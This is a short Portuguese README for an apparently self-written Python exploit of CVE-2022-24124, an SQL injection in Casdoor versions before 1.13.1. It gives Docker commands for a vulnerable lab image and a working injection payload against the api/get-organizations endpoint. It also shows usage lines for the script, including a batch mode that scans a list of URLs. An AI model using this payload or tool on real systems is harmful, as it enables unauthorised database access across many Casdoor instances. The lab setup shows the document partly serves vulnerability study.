
Exploit do CVE-2022-24124
O Casdoor é uma plataforma centralizada de autenticação de logon único (SSO) baseada em OAuth 2.0/OIDC
CVE ID: CVE-2022-24124
CNPD ID: CNPD-202201-7304
Nível de risco: Alto ( 7.5 HIGH )
POC/EXP: Divulgado publicamente
Casdoor < Casdoor 1.13.1 // Todas as versões anteriores à 1.13.1 são afetadas
Esta vulnerabilidade é do tipo injeção de SQL. A API de consulta apresenta uma vulnerabilidade de injeção de SQL relacionada aos parâmetros de campo e valor, como demonstrado em api/get-organizations.
Baixar a imagem da vulnerabilidade
docker pull vulfocus/casdoor:1.13.0

Iniciar o ambiente vulnerável
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0

Abrir a página do ambiente vulnerável

Usar o POC para construir o payload
POC: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)

python3 CVE-2022-24124.py -h

python3 CVE-2022-24124.py -u http://127.0.0.1

python3 CVE-2022-24124.py -f urls.txt

Inspirado em https://www.t00ls.com/thread-66989-1-1.html
Escrevi uma versão em Python como exercício e adicionei um recurso de verificação em lote.